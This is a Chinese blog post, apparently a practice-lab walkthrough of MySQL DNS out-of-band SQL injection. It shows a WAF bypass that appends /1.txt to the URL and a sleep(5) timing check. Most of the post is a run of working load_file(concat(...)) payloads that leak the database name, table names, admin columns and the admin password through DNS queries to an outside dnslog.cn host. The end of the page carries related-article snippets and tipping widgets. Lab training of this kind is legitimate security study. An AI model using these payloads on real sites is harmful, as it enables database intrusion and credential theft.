数据库外带——DNS注入

最新推荐文章于 2024-02-21 21:59:35 发布
最新推荐文章于 2024-02-21 21:59:35 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: 黑盒测试 白箱测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43264067/article/details/106120986
版权

Mysql注入——DNS注入

靶场地址
原理:利用UNC路径去访问服务器,dns会有日志,通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志

1.,我们看到靶场,首先尝试最简单的get传参,注入
在这里插入图片描述它是直接将id传参拼接进去,然后用mysqli_connect()函数进行针对数据库的查询,我们顺理成章再后面输入内容?id=1进行测试
在这里插入图片描述页面正常,继续输入 and 1=1
在这里插入图片描述但是却遭到网站防火墙的阻拦,于是,我们尝试绕过防火墙,在后面输入url栏,网址后加一个/1.txt,因为网站防火墙,会认为1.txt是一个无害文件,白名单,认为可信任,并且再查不到1.txt的时候,会往上一级进行审核
这是比较老的waf
在这里插入图片描述成功绕过,页面返回正常,继续输入 and 1=2,判断页面回显
在这里插入图片描述页面没有任何回显,我们继续输入sleep(5)
在这里插入图片描述页面有明显延迟,于是判断可以认为这个网页存在延迟注入
在这里插入图片描述按照延时注入的方法,可以做出来,但是会花费大量的时间,于是,我们尝试利用dns注入的方法,在url栏进行dns报错的方法来查询数据库名
在url栏输入

?id=1 and (select load_file(concat('//',(select database()),'.57t2co.dnslog.cn/abc')))

在这里插入图片描述

得到数据库名
继续查询表名,在url输入代码

?id=1 and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.57t2co.dnslog.cn/abc')))

在这里插入图片描述得到表名利用limit查询出所有表名

?id=1 and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.57t2co.dnslog.cn/abc')))

?id=1 and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 2,1),'.57t2co.dnslog.cn/abc')))

在这里插入图片描述发现只有两个表名
继判断flag可能存在在admin表里,查询admin表的数据
输入代码

?id=1 and (select load_file(concat('\\\\',(select column_name from information_schema.columns where TABLE_NAME='admin' limit 0,1),'.57t2co.dnslog.cn/abc')))

在这里插入图片描述继续利用limit查询字段名

?id=1 and (select load_file(concat('\\\\',(select column_name from information_schema.columns where TABLE_NAME='admin' limit 1,1),'.57t2co.dnslog.cn/abc')))


?id=1 and (select load_file(concat('\\\\',(select column_name from information_schema.columns where TABLE_NAME='admin' limit 3,1),'.57t2co.dnslog.cn/abc')))

ID,username,password,只有三个数据,判断可能存在在password字段里,我们查询一下password的数据

?id=1 and (select load_file(concat('\\\\',(select password from admin limit 0,1),'.57t2co.dnslog.cn/abc')))

在这里插入图片描述1flag1good1

猫鼠信安
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DNS注入
nobugnomoney的博客
09-11 1332
1.我们首先要知道什么是DNS: 域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址。域名解析就是域名到IP地址的转换过程。域名的解析工作由DNS服务器完成。 域名解析也叫域名指向、服务器设置、域名配置以及反向IP登记等等。说得简单点就是将好记的域名解析成IP,服务由DNS服务器完成,是把域名解析到一个IP地址,然后在此IP地址的主机上将一个子目录与域名绑定。 互联网中的地址是数字的IP地
MySQL注入Dns 注入
最新发布
baimaozi008的博客
05-29 995
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。然后1806dl.dnslog.cn的子域名的解析都是在某台服务器,然后他记录下来了有人请求访问了error.1806dl.dnslog.cn,然后在DnsLog这个平台上面显示出来了。
DNS外带注入
weixin_52501704的博客
10-09 1469
DNS外带注入
【SQL注入-有回显】DNS请求注入:原理、平台、使用过程、配置
06-14 1568
【SQL注入-有回显】
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问...
咖啡外带盒PSD样机
07-31
"咖啡外带盒PSD样机"是一款专为咖啡杯设计准备的资源,可以帮助设计师高效地展示他们的创意,尤其是在包装设计阶段。 这款样机以PSD(Photoshop Document)格式提供,这是Adobe Photoshop软件的标准文件格式,意味...
sqlmap注入工具
12-05
Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL...它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。总之一款不可多得的安全届注入神器。
完美卸载Oracle数据库
01-19
刚开始的时候因为我本地只装了MySQL,所以用就连接了本地MySQL,接口大体完事有在tomcat中测试了下,也能跑通,但是后来又要改数据库,所以就想安装一个本地的oracle测试一下,这一安装就是一个下午外带一个晚上啊,...
QT 支持多客户端链接TCP服务器,外带数据库连接池
11-14
在“QT支持多客户端链接TCP服务器,外带数据库连接池”这个项目中,我们将探讨如何利用QT库构建一个能同时处理多个客户端连接的TCP服务器,并有效地管理数据库连接。 首先,我们要构建TCP服务器,这主要依赖于QT的...
深入探讨DNS数据注入DNS中毒攻击检测 (C/C++代码实现)
chen1415886044的博客
12-24 1222
DNS数据注入DNS中毒攻击是网络安全领域中两种重要的攻击方式。DNS数据注入是一种攻击手段,通过向DNS服务器发送恶意数据包,以篡改其正常功能。而DNS中毒攻击则是一种针对DNS缓存的攻击,目的是通过向DNS服务器的缓存中添加恶意记录,从而使用户访问到错误的网站。
带外攻击(OOB)RCE无回显思路总结详解
qq_71467825的博客
06-23 2255
向服务器提交一个payload,而服务器响应给我们相关的response信息,大家都叫他带内攻击,这些理论的东西,我们简单理解就好,这里我们就理解成。传输层协议使用带外数据(out-of-band,OOB)来发送一些重要的数据,如果通信一方有重要的数据需要通知对方时,协议能够将这些数据快速地发送到对方。为了发送这些数据,协议一般不使用与普通数据相同的通道,而是使用另外的通道。linux系统的套接字机制支持低层协议发送和接受带外数据。但是TCP协议没有真正意义上的带外数据
Dns注入
qq_58000413的博客
09-20 662
DNS-LOG注入 linux能不能用的话[一般不能dnslog注入,除非搭建smb服务]LOAD_FILE(绝对路径) 记得反斜杠。database().hjw.com =>日志就会记录。mysql稍微高一点的版本,默认是不可以读取内容的。load_file 读取文件的函数。DNS-LOG:DNS服务(LOG日志)=>DNS解析日志。文件共享(UNC路径)访问的东西都是把他当做文件处理。dns-log注入:obb(数据外带)Mysql函数:LOAD_FILE()
dns外带数据【渗透测试】
热门推荐
leeezp的博客
09-09 32万+
上一篇文章我们已经介绍了搭建自己的dns log server 方法,接下来我将介绍如何通过dns query外带数据。下文中介绍的方法均为根据本人经验原创的方法,网上应该算是首次公开。
DNSlog外带
adaosanqian的博客
02-28 7412
减轻盲注的复杂操作,运用DNSlog外带来进行操作
Linux系统中的DNS域名解析服务
shanjun12的博客
12-17 936
DNSY域名解析
SQL注入DNSLog外带注入
dragon的博客
02-21 2616
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
sql注入外带dnslog
09-11
很抱歉,我不能提供关于SQL注入外带DNS log的任何信息。 SQL注入是一种安全漏洞,允许攻击者通过在应用程序中插入恶意SQL代码来获取未经授权的访问权限或者对数据库进行操纵。这是一种严重的漏洞,应该被尽快修复。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猫鼠信安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值